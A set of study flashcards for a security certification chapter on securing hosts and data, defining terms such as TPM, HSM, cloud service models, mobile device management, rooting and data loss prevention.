Ch5: Securing Hosts and Data Flashcards
Least functionality
A core security principle stating that systems should be deployed with the least amount of applications, services, and protocols
Trusted OS
A trusted OS meets a set of predetermined requirements, such as those identified in the Common Criteria. Uses the MAC (mandatory access control) model
A master image provides
a secure starting point for systems
Admins create master images with templates or other tools to…
create a secure baseline
Integrity measurements discover…
when a system deviates from the baseline
The WannaCry ransomware worked only because…
Systems were not kept up-to-date with current patches. Microsoft had released an update to the known vulnerability two months before the attack
Patch management ensures
OS’s and applications are up to date with current patches to protect systems against known vulnerabilities
Change management
Defines the process and accounting structure for handling modifications and upgrades. Goal is to provide documentation for all changes and reduce risks related to unintended outages
Application whitelist
List of authorized software that prevents users from installing or running software that isn’t on the list
Application blacklist
List of unauthorized software that prevents users from installing or running software on the list
Sandboxing
The use of an isolated area, often used for testing
I can create a sandbox with…
A VM or the chroot command on Linux
Secure deployment environment includes
Development, testing, staging, and production elements
Secure systems design considers…
Electromagnetic interference (EMI) and electromagnetic pulse (EMP)
EMI sources
Motors, power lines, fluorescent lights. Can be prevented with shielding
Mild forms of EMP
Electrostatic discharge and lightning. Systems can be protected from these
TPM
Trusted Platform Module is a hardware chip included on many laptops and mobile devices that includes a unique RSA asymmetric key burned into the chip and provides a hardware root of trust
TPM provides
Full disk encryption and supports a secure boot process and remote attestation
HSM
Hardware security module is a removable or external device that can generate, store, and manage RSA keys used in asymmetric encryption. Many server-based applications use an HSM to protect keys
SaaS
Software as a Service cloud-based technologies includes any software or application provided to users over a network like the Internet, such as web-based email
PaaS
Platform as a Service provides customers with a fully managed platform, which the vendor keeps up to date with current patches
IaaS
Infrastructure as a Service provides customers with access to hardware in a self-managed platform
CASB
A cloud access security broker is a software tool deployed between an organization’s network and the cloud provider that provides Security as a Service by monitoring traffic and enforcing security policies
Private clouds
Only available for one organization
Public cloud services
…are provided by 3rd-party companies and available to anyone
Community cloud
Shared by multiple organizations
Hybrid cloud
Combination of 2 or more clouds
COPE devices
Corporate-owned, personally enabled devices are owned by the organization but employees can use them for personal reasons
BYOD
A bring your own device policy allows employees to connect their own personal devices to the corporate network
CYOD
A choose your own device policy includes a list of approved devices. Employees with a device on the list can connect to the network
VDI
A virtual desktop infrastructure is a virtual desktop and these can be created so that users can access them from a mobile device
MDM tools help…
Mobile device management tools help enforce security policies on mobile devices.
MDM tools include
Use of storage segmentation, containerization, full disk encryption, and enforcing strong authentication methods to prevent unauthorized access.
Remote wipe
sends a signal to a lost or stolen device to erase all data
Geolocation
Uses GPS and can help locate a lost or stolen device
Geofencing
creates a virtual fence or geographic boundary and can be used to detect when a device is within an organization’s property
GPS tagging
adds geographical data to files such as pictures
Context-aware authentication
uses multiple elements to authenticate a user and a mobile device
Jailbreaking
removes all software restrictions from an Apple device
Rooting (android)
modifies an Android device, giving users root-level access to the device. Overwriting the firmware with custom firmware is one way (“another way”) to root an Android device
Sideloading
The process of installing software on an Android device from a source other than an authorized store
Tethering
The process of sharing a mobile device’s Internet connection with other devices
Wi-Fi Direct
A standard that allows devices to connect without a wireless access point or wireless router
You can use what to prevent tethering or Wi-Fi Direct Internet access?
MDM tools can block access to devices using tethering or Wi-Fi Direct to access the Internet
Embedded system
Any device that has a dedicated function and uses a computer system to perform that function. Includes any IoT devices such as wearable technology and home automation systems
SCADA system
A supervisory control and data acquisition system has embedded systems that control an industrial control system (ICS) such as one used in a power plant or water treatment facility
Primary methods of protecting confidentiality of data
encryption and strong access controls
Database column encryption
protects individual fields within a database
File/folder-level protection
protects individual files
Full disk encryption
protects entire disks
chmod
changes permissions on linux systems
Data exfiltration
the unauthorized transfer of data out of a network
DLP techniques
Data loss prevention techniques can block the use of USB devices to prevent data loss and monitor outgoing email traffic for unauthorized data transfers
Cloud-based DLP
can enforce security policies for data stored in the cloud, such as ensuring that Personally Identifiable Information (PII) is encrypted
